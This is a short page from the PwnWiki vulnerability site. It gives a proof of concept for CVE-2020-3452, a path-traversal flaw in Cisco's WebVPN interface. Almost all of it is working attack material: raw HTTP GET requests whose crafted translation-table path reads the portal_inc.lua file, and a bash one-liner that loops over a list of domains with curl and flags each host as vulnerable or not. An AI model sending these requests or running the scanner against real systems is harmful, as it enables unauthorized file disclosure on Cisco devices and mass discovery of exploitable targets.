免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
POC
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Cookie: webvpnlogin=1; webvpnLang=en
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 Host: 127.0.0.1 Content-Length: 2
从列表中单行检查CVE-2020-3452
while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo VULNERABLE $DOM || echo NOT VULNERABLE $DOM; done < $1
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
